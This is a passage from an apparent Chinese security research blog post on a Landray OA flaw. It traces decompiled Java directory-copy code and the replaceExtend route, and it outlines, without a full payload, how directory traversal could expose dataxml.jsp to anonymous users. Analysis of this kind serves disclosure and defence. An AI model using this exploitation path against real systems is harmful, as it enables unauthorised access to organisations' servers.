YCPsuHVBcXIwdu46gtKQMM6dPwJBBfeDz2q/SpxY1sbFuBf/AipoFb9+FwMbaApatzRHwpT+Xy0VwSARsbFrVbeG+ISMjjRc+b9C+rRXMWjSF96sAyMiIJyn9f9PUxACysjICN+G+5vXSDxYWzQXeN22soQYtTY0qp/mV2FpbYM2qBQIJYzlFxUZYs2oBbK0tGiCy7ycvz8Hc2VNw7uI1pt+5i9cwd/aUertxsnnrAaYxHIqi/ltq3Xoqj8fDuQtuANDg7zXq6+kgNOwDOnW0rXR4aNgH6OvpAACGDeU3lHLb/SEGDujFdNfF58+fce7cOejr6wv0f/nyJWJiYjB58mSUlZWhadOmMDc3h4uLC4YOHQoA0NDQgJOTEwBg165dOHr0KCIiItCsWbMa56ukpISpU6eCy+UiKSkJvXr1wo0bN7BmzRoA/KeBDg4OWLVqldC0osQG8JM/ObmKi4dHjx6BzWZDQkICHh4eMDc3R2BgIPLz83HixAlmPA6HA3V1/rtgKioqAu80FhUV4cKFC9i3bx9kZWUhKyuLbt26wcXFBUePHmXG2717N1q25L+H2r17d9y8eRNt2rTBw4cPYWBggAUL+O9UbN26FRcuXKhxfVFUQwsNi8SxExcwa8aEascLeBsMQ329Os2rqKgI8jU0NPP6TSBycj9j0/plTJKlo62FtLSMaqerTFvb1vC4/wTx8UmQkZFCckoarK1aQbNxYzx+8hIFhYWIjIxFGZcLa0vxvl/+IToOebn5mDNjIsrKuNi+6wji45Ogp1e3d0L/awoLi/AuKAwzp49t6FDqjYyMTJ2Gi6q85kxV5dU0vLYM9HWYMsvLN9DXEUvZFEVRX6tV0vgzJYwA0Le3PS78ew2Wrc2E7qrl5xfgqusdTBg7nOk3bGg/tGhuAnOzpmKZv5aWllDCCAAxMTEAwCQ3ACAtLQ1VVVWm29zcnPk/h8OBtrY2vL29RUoaY2NjMXv2bPj7+6N169ZIS0sT2BbR0dGYO3dupdOKEhsAeHh4QEWl8icrWlpamDVrFrZu
<p>这里获取两个参数的值删除extendId目录然后将folderName目录的文件复制过来。</p>
<p><a id=img5 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185539-9cdeaf8e-3d18-1.png><img src="data:image/png;base64,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
<p>继续跟进copyDirectory得到</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=kd>static</span> <span class=kt>void</span> <span class=nf>copyDirectory</span><span class=o>(</span><span class=n>File</span> <span class=n>srcDir</span><span class=o>,</span> <span class=n>File</span> <span class=n>destDir</span><span class=o>,</span> <span class=n>FileFilter</span> <span class=n>filter</span><span class=o>,</span> <span class=kt>boolean</span> <span class=n>preserveFileDate</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span> <span class=o>{</span>
<span class=c1>// 检查源目录和目标目录的有效性</span>
<span class=n>checkFileRequirements</span><span class=o>(</span><span class=n>srcDir</span><span class=o>,</span> <span class=n>destDir</span><span class=o>);</span>
<span class=c1>// 确保源是一个目录</span>
<span class=k>if</span> <span class=o>(!</span><span class=n>srcDir</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Source '"</span> <span class=o>+</span> <span class=n>srcDir</span> <span class=o>+</span> <span class=s>"' exists but is not a directory"</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 确保源和目标不是同一个目录</span>
<span class=k>else</span> <span class=k>if</span> <span class=o>(</span><span class=n>srcDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>().</span><span class=na>equals</span><span class=o>(</span><span class=n>destDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>()))</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Source '"</span> <span class=o>+</span> <span class=n>srcDir</span> <span class=o>+</span> <span class=s>"' and destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' are the same"</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>else</span> <span class=o>{</span>
<span class=n>List</span><span class=o>&lt;</span><span class=n>String</span><span class=o>&gt;</span> <span class=n>exclusionList</span> <span class=o>=</span> <span class=kc>null</span><span class=o>;</span>
<span class=c1>// 检查目标目录是否是源目录的子目录</span>
<span class=k>if</span> <span class=o>(</span><span class=n>destDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>().</span><span class=na>startsWith</span><span class=o>(</span><span class=n>srcDir</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>()))</span> <span class=o>{</span>
<span class=c1>// 获取源目录中的文件列表</span>
<span class=n>File</span><span class=o>[]</span> <span class=n>srcFiles</span> <span class=o>=</span> <span class=n>filter</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>?</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>()</span> <span class=o>:</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>(</span><span class=n>filter</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>srcFiles</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=n>srcFiles</span><span class=o>.</span><span class=na>length</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=c1>// 创建排除列表,防止无限递归复制</span>
<span class=n>exclusionList</span> <span class=o>=</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>(</span><span class=n>srcFiles</span><span class=o>.</span><span class=na>length</span><span class=o>);</span>
<span class=k>for</span> <span class=o>(</span><span class=n>File</span> <span class=n>srcFile</span> <span class=o>:</span> <span class=n>srcFiles</span><span class=o>)</span> <span class=o>{</span>
<span class=n>File</span> <span class=n>copiedFile</span> <span class=o>=</span> <span class=k>new</span> <span class=n>File</span><span class=o>(</span><span class=n>destDir</span><span class=o>,</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>getName</span><span class=o>());</span>
<span class=n>exclusionList</span><span class=o>.</span><span class=na>add</span><span class=o>(</span><span class=n>copiedFile</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>());</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=c1>// 执行实际的目录复制操作</span>
<span class=n>doCopyDirectory</span><span class=o>(</span><span class=n>srcDir</span><span class=o>,</span> <span class=n>destDir</span><span class=o>,</span> <span class=n>filter</span><span class=o>,</span> <span class=n>preserveFileDate</span><span class=o>,</span> <span class=n>exclusionList</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>继续跟进</p>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=kd>static</span> <span class=kt>void</span> <span class=nf>doCopyDirectory</span><span class=o>(</span><span class=n>File</span> <span class=n>srcDir</span><span class=o>,</span> <span class=n>File</span> <span class=n>destDir</span><span class=o>,</span> <span class=n>FileFilter</span> <span class=n>filter</span><span class=o>,</span> <span class=kt>boolean</span> <span class=n>preserveFileDate</span><span class=o>,</span> <span class=n>List</span><span class=o>&lt;</span><span class=n>String</span><span class=o>&gt;</span> <span class=n>exclusionList</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span> <span class=o>{</span>
<span class=c1>// 获取源目录中的文件列表,如果有过滤器则应用过滤器</span>
<span class=n>File</span><span class=o>[]</span> <span class=n>srcFiles</span> <span class=o>=</span> <span class=n>filter</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>?</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>()</span> <span class=o>:</span> <span class=n>srcDir</span><span class=o>.</span><span class=na>listFiles</span><span class=o>(</span><span class=n>filter</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>srcFiles</span> <span class=o>==</span> <span class=kc>null</span><span class=o>)</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Failed to list contents of "</span> <span class=o>+</span> <span class=n>srcDir</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=c1>// 确保目标目录存在且是一个目录</span>
<span class=k>if</span> <span class=o>(</span><span class=n>destDir</span><span class=o>.</span><span class=na>exists</span><span class=o>())</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(!</span><span class=n>destDir</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' exists but is not a directory"</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span> <span class=k>else</span> <span class=k>if</span> <span class=o>(!</span><span class=n>destDir</span><span class=o>.</span><span class=na>mkdirs</span><span class=o>()</span> <span class=o>&amp;&amp;</span> <span class=o>!</span><span class=n>destDir</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' directory cannot be created"</span><span class=o>);</span>
<span class=o>}</span>
<span class=c1>// 确保目标目录可写</span>
<span class=k>if</span> <span class=o>(!</span><span class=n>destDir</span><span class=o>.</span><span class=na>canWrite</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destDir</span> <span class=o>+</span> <span class=s>"' cannot be written to"</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=c1>// 遍历源目录中的所有文件和子目录</span>
<span class=k>for</span><span class=o>(</span><span class=n>File</span> <span class=n>srcFile</span> <span class=o>:</span> <span class=n>srcFiles</span><span class=o>)</span> <span class=o>{</span>
<span class=n>File</span> <span class=n>dstFile</span> <span class=o>=</span> <span class=k>new</span> <span class=n>File</span><span class=o>(</span><span class=n>destDir</span><span class=o>,</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>getName</span><span class=o>());</span>
<span class=c1>// 检查是否在排除列表中</span>
<span class=k>if</span> <span class=o>(</span><span class=n>exclusionList</span> <span class=o>==</span> <span class=kc>null</span> <span class=o>||</span> <span class=o>!</span><span class=n>exclusionList</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=n>srcFile</span><span class=o>.</span><span class=na>getCanonicalPath</span><span class=o>()))</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>srcFile</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=c1>// 如果是目录,递归复制</span>
<span class=n>doCopyDirectory</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>dstFile</span><span class=o>,</span> <span class=n>filter</span><span class=o>,</span> <span class=n>preserveFileDate</span><span class=o>,</span> <span class=n>exclusionList</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=c1>// 如果是文件,直接复制</span>
<span class=n>doCopyFile</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>dstFile</span><span class=o>,</span> <span class=n>preserveFileDate</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=c1>// 如果需要保留文件日期,设置目标目录的最后修改时间</span>
<span class=k>if</span> <span class=o>(</span><span class=n>preserveFileDate</span><span class=o>)</span> <span class=o>{</span>
<span class=n>destDir</span><span class=o>.</span><span class=na>setLastModified</span><span class=o>(</span><span class=n>srcDir</span><span class=o>.</span><span class=na>lastModified</span><span class=o>());</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=kd>static</span> <span class=kt>void</span> <span class=nf>doCopyFile</span><span class=o>(</span><span class=n>File</span> <span class=n>srcFile</span><span class=o>,</span> <span class=n>File</span> <span class=n>destFile</span><span class=o>,</span> <span class=kt>boolean</span> <span class=n>preserveFileDate</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>destFile</span><span class=o>.</span><span class=na>exists</span><span class=o>()</span> <span class=o>&amp;&amp;</span> <span class=n>destFile</span><span class=o>.</span><span class=na>isDirectory</span><span class=o>())</span> <span class=o>{</span>
<span class=k>throw</span> <span class=k>new</span> <span class=n>IOException</span><span class=o>(</span><span class=s>"Destination '"</span> <span class=o>+</span> <span class=n>destFile</span> <span class=o>+</span> <span class=s>"' exists but is a directory"</span><span class=o>);</span>
<span class=o>}</span> <span class=k>else</span> <span class=o>{</span>
<span class=n>Path</span> <span class=n>srcPath</span> <span class=o>=</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>toPath</span><span class=o>();</span>
<span class=n>Path</span> <span class=n>destPath</span> <span class=o>=</span> <span class=n>destFile</span><span class=o>.</span><span class=na>toPath</span><span class=o>();</span>
<span class=kt>long</span> <span class=n>newLastModifed</span> <span class=o>=</span> <span class=n>preserveFileDate</span> <span class=o>?</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>lastModified</span><span class=o>()</span> <span class=o>:</span> <span class=n>destFile</span><span class=o>.</span><span class=na>lastModified</span><span class=o>();</span>
<span class=n>Files</span><span class=o>.</span><span class=na>copy</span><span class=o>(</span><span class=n>srcPath</span><span class=o>,</span> <span class=n>destPath</span><span class=o>,</span> <span class=n>StandardCopyOption</span><span class=o>.</span><span class=na>REPLACE_EXISTING</span><span class=o>);</span>
<span class=n>checkEqualSizes</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>destFile</span><span class=o>,</span> <span class=n>Files</span><span class=o>.</span><span class=na>size</span><span class=o>(</span><span class=n>srcPath</span><span class=o>),</span> <span class=n>Files</span><span class=o>.</span><span class=na>size</span><span class=o>(</span><span class=n>destPath</span><span class=o>));</span>
<span class=n>checkEqualSizes</span><span class=o>(</span><span class=n>srcFile</span><span class=o>,</span> <span class=n>destFile</span><span class=o>,</span> <span class=n>srcFile</span><span class=o>.</span><span class=na>length</span><span class=o>(),</span> <span class=n>destFile</span><span class=o>.</span><span class=na>length</span><span class=o>());</span>
<span class=n>destFile</span><span class=o>.</span><span class=na>setLastModified</span><span class=o>(</span><span class=n>newLastModifed</span><span class=o>);</span>
<span class=o>}</span>
<span class=o>}</span>
</pre></div>
<p>最后通过<code>Files.copy</code>将一个目录及其内容递归地复制到另一个目录。</p>
<h2 id=toc-5>路由分析</h2>
<p>通过分析配置文件 <code>/WEB-INF/KmssConfig/sys/ui/spring-mvc.xml</code>,我们可以得出以下结论:</p>
<div class=highlight><pre><span></span><span class=nt>&lt;bean</span>
<span class=na>name=</span><span class=s>"/sys/ui/sys_ui_component/sysUiComponent.do"</span>
<span class=na>class=</span><span class=s>"com.landray.kmss.sys.ui.actions.SysUiComponentAction"</span>
<span class=na>lazy-init=</span><span class=s>"true"</span>
<span class=na>parent=</span><span class=s>"KmssBaseAction"</span><span class=nt>&gt;</span>
<span class=c>&lt;!-- 配置详情省略 --&gt;</span>
<span class=nt>&lt;/bean&gt;</span>
</pre></div>
<p>访问方式</p>
<ul>
<li><strong>URL</strong>: <code>/sys/ui/sys_ui_component/sysUiComponent.do</code></li>
<li><strong></strong>: <code>com.landray.kmss.sys.ui.actions.SysUiComponentAction</code></li>
</ul>
<p>调用特定方法</p>
<p>要调用 <code>SysUiComponentAction</code> 类中的 <code>replaceExtend()</code> 方法需要在URL中添加 <code>method</code> 参数</p>
<div class=highlight><pre><span></span><span class=err>/sys/ui/sys_ui_component/sysUiComponent.do?method=replaceExtend</span>
</pre></div>
<p>接下来如何构造PoC就很清晰了只需要将<code>dataxml.jsp</code>所在的目录<code>/sys/common</code>通过目录穿越复制到匿名用户可访问的Web目录即可。</p>
</div>
<div class=post-user-action style=margin-top:34px>
<span class="btn btn-default pull-right" id=mark data-action=topic data-pk=15006>
<span id=mark-text>点击收藏 </span><span class=i-seprator> | </span><span id=mark-count>0</span>
</span>
<span class="btn btn-default pull-right" id=follow_topic data-pk=15006>
<span>关注</span><span class=i-seprator> | </span><span id=follow-count>1</span>
</span>
<span class="btn btn-default pull-right">
<span>
<span id=ready_reward data-toggle=modal data-target=#myModal>打赏</span>
</span>
</span>
<div class=clearfix></div>
</div>
<div class=related-section>
<div class=related-box>
<span><a class=pull-left href=https://xz.aliyun.com/t/15004 title="深入解析PHP CGI Windows平台远程代码执行漏洞CVE-2024-4577|CVE-2012-1823"><span class=related-label style="padding:3px 4px;margin-right:3px">上一篇:</span>深入解析PHP CGI Windo...</a></span>
<span><a class=pull-left href=https://xz.aliyun.com/t/15009 title=Windows基础知识-PE结构之初始PE><span class=related-label>下一篇:</span>Windows基础知识-PE结构之...</a></span>
</div>
</div>
</div>
</div>
</div>
<div class="modal fade" id=myModal role=dialog aria-labelledby=myModalLabel aria-hidden=true>
<div class=modal-dialog>
<div class=modal-content>
<div class=modal-header>
<h4 class=modal-title id=myModalLabel style=text-align:center>
积分打赏
</h4>
</div>
<div class=modal-body id=button-value>
<div style=text-align:center>
<div role=group>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type1>
1分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type2>
2分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type3>
5分
</button>
</div>
<br>
<div style=margin-top:20px>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type4>
8分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type5>
10分
</button>
<button type=button class="btn btn-secondary m64" style=min-width:64px data-value=type6>
20分
</button>
</div>
</div>
</div>
<div class=modal-footer id=confirm>
<button type=button class="btn btn-default" data-dismiss=modal>关闭</button>
<button type=button class="btn btn-primary" id=reward_topic data-pk=15006>确定</button>
</div>
</div>
</div>
</div>
<div class="row box">
<ol class=breadcrumb>
<li class=active>1 条回复</li>
</ol>
<div class="box-container post-container">
<ul class=post-info id=reply-20127>
<li>
<div class="row1 user-info clearfix">
<img class="avatar pull-left tiny-avatar" src="data:image/png;base64,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